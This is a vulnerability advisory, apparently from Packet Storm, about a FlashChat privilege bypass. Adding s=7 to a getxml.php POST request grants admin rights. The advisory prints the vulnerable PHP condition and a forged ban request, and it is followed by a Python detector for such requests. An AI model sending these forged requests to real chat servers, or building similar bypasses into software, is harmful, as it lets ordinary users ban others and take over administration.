flashchat-bypass.txt

Date: 17 Oct 2008
Reported by: eLiSiA
Type: packetstorm
Source: packetstormsecurity.com

File connection.php allows a user to bypass role filtering and gain admin privileges by adding s=7 to the POST data string in getxml.ph

Code
File: connection.php

```
if(
ChatServer::userInRole($this->userid, ROLE_ADMIN) ||
ChatServer::userInRole($this->userid, ROLE_MODERATOR) ||
($req['s'] == 7) <-- *bypass line*
)
```

This piece of code allows a normal user to bypass role filtering and be granted the admin role. To exploit the vulnerability, simply send to getxml.php, while in the chat, this POST data string (for example by intercepting and modifying a legitimate message packet sent to the server with the Tamper Data plugin for Firefox):

For example, to ban a user, simply add the bypass to the normal ban request string:

replace:

```
//normal message sent to server that has been intercepted
sendAndLoad=%5Btype%20Function%5D&t=hi everybody&r=0&id=
```

with:

```
//normal ban packet used by admins or mods
sendAndLoad=%5Btype%20Function%5D&t=&r=0&u=5581&b=3&c=banu&cid=1&id=

//forged packet sent by attacker
sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id=
```

*note the s=7 added

This will IP-ban the user with id 5581 from the chat.

eLiSiA - 17-10-2008
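A defender-side check for the forged request described above, added here as an example (not code from the advisory or from FlashChat): it scans form-encoded POST bodies sent to getxml.php and reports any that carry s=7 from a sender who is not an admin or moderator. The sample requests, the sender ids 12 and 900, and the privileged-id set are constructed assumptions.

```python
from urllib.parse import parse_qs

# Constructed sample: (sender user id, raw POST body sent to getxml.php).
# Bodies follow the request strings quoted in the advisory; ids 12 and 900 are made up.
SAMPLE_REQUESTS = [
    (12, "sendAndLoad=%5Btype%20Function%5D&t=hi everybody&r=0&id="),
    (900, "sendAndLoad=%5Btype%20Function%5D&t=&r=0&u=5581&b=3&c=banu&cid=1&id="),
    (12, "sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id="),
]

# Assumption: the reviewer has an authoritative set of admin/moderator ids
# (for example exported from the chat's user table).
PRIVILEGED_USER_IDS = {900}


def is_bypass_value(raw):
    """True if raw is numerically equal to 7.

    The check quoted in the advisory uses PHP's loose ==, so match on the
    numeric value rather than on the exact string "7".
    """
    try:
        return float(raw.strip()) == 7
    except ValueError:
        return False


def find_forged_requests(requests, privileged_ids):
    """Return findings for requests that carry s=7 from a non-privileged sender."""
    findings = []
    for user_id, body in requests:
        params = parse_qs(body, keep_blank_values=True)
        # A parameter can be repeated; inspect every occurrence of "s".
        if not any(is_bypass_value(v) for v in params.get("s", [])):
            continue
        if user_id in privileged_ids:
            continue
        findings.append({
            "user_id": user_id,
            "command": params.get("c", [""])[0],
            "target": params.get("u", [""])[0],
        })
    return findings


if __name__ == "__main__":
    for finding in find_forged_requests(SAMPLE_REQUESTS, PRIVILEGED_USER_IDS):
        print(finding)
```

The same lookup that builds the privileged-id set is what the server-side condition should rely on alone: the role decision must come from `userInRole`, never from a request parameter.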
